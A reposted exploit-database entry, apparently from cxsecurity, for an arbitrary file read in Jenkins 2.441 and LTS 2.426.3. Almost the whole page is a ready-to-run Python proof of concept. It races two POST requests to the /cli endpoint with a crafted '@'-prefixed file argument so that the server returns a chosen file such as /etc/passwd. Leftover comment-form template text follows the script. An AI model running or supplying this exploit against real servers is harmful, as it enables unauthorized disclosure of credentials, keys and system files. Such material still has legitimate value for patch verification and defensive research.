Jenkins 2.441 / LTS 2.426.3 Arbitrary File Read
2024-1-30 06:10:22 Author: cxsecurity.com(查看原文) 阅读量:15 收藏

Jenkins 2.441 / LTS 2.426.3 Arbitrary File Read

# python poc.py # [*] usage: python poc.py http://127.0.0.1:8888/ [/etc/passwd] import threading import http.client import time import uuid import urllib.parse import sys if len(sys.argv) != 3: print('[*] usage: python poc.py http://127.0.0.1:8888/ [/etc/passwd]') exit() data_bytes = b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@' + sys.argv[2].encode() + b'\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05zh_CN\x00\x00\x00\x00\x03' target = urllib.parse.urlparse(sys.argv[1]) uuid_str = str(uuid.uuid4()) print(f'REQ: {data_bytes}\n') def req1(): conn = http.client.HTTPConnection(target.netloc) conn.request("POST", "/cli?remoting=false", headers={ "Session": uuid_str, "Side": "download" }) print(f'RESPONSE: {conn.getresponse().read()}') def req2(): conn = http.client.HTTPConnection(target.netloc) conn.request("POST", "/cli?remoting=false", headers={ "Session": uuid_str, "Side": "upload", "Content-type": "application/octet-stream" }, body=data_bytes) t1 = threading.Thread(target=req1) t2 = threading.Thread(target=req2) t1.start() time.sleep(0.1) t2.start() t1.join() t2.join()



 

Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }}

|

Date:

{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1


{{ x.comment }}


文章来源: https://cxsecurity.com/issue/WLB-2024010100
如有侵权请联系:admin#unsafe.sh